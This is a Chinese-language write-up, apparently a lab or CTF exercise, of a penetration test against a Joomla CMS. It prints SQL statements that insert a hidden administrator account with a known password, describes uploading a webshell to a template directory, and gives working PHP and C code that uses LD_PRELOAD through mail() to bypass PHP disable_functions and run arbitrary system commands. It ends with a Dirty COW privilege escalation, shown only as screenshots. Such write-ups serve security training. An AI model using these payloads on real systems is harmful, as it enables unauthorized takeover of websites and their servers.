joomla渗透测试(脏牛提权)

本文详细介绍了通过JoomlaCMS进行渗透测试的过程,包括利用漏洞获取MySQL账号密码、创建管理员账户、上传并利用webshell,以及如何绕过disable_function限制执行系统命令,最终实现提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本来是个域渗透,不过环境有问题,就当作web题在做了


解题过程

在这里插入图片描述这是一个joomla cms

  • 我们先扫一下目录
    在这里插入图片描述

  • 连接mysql
    得到MySQL的账号和密码
    在这里插入图片描述在这里插入图片描述然后创建新的管理员

     INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
    
    INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');
    

    这儿创建的管理员账号为admin2 secret
    不同的网站对应不同的前缀,改一下前缀即可

  • 登录后台,上传shell
    在这里插入图片描述在这里插入图片描述访问/templates/beez3//HyyMBb.php,即可getshell
    在这里插入图片描述

  • 绕过disable_function
    上传cmd.php

     <?php
    #move_uploaded_file($_FILES['evil']['tmp_name'], '/var/www/html/admin/shells/fEsiIOZ6Eup6pSW6/evil.so');
    putenv('LD_PRELOAD=/tmp/evil.so');
    putenv("_evilcmd=ls");
    mail('a','a','a');
    echo file_get_contents('/tmp/result.txt');
    ?>
    

    编译evil.c然后上传到/tmp目录下

    /* compile: gcc -Wall -fPIC -shared -o evil.so evil.c -ldl */
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
    void payload(char *cmd) {
      char buf[512];
      strcpy(buf, cmd);
      strcat(buf, " > /tmp/result.txt");
      system(buf);}
    
    int getuid() {
      char *cmd;
      if (getenv("LD_PRELOAD") == NULL) { return 0; }
      unsetenv("LD_PRELOAD");
      if ((cmd = getenv("_evilcmd")) != NULL) {
        payload(cmd);
      }
      return 1;
    }
    

    在这里插入图片描述即可执行系统命令

  • 提权
    根据以下我们知道,这很明显是一个反向代理,实际的web服务不在192.168.1.110
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述找到一个账号密码,我们试一试能不能登录192.168.1.110
    在这里插入图片描述在这里插入图片描述直接使用脏牛提权
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述成功提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值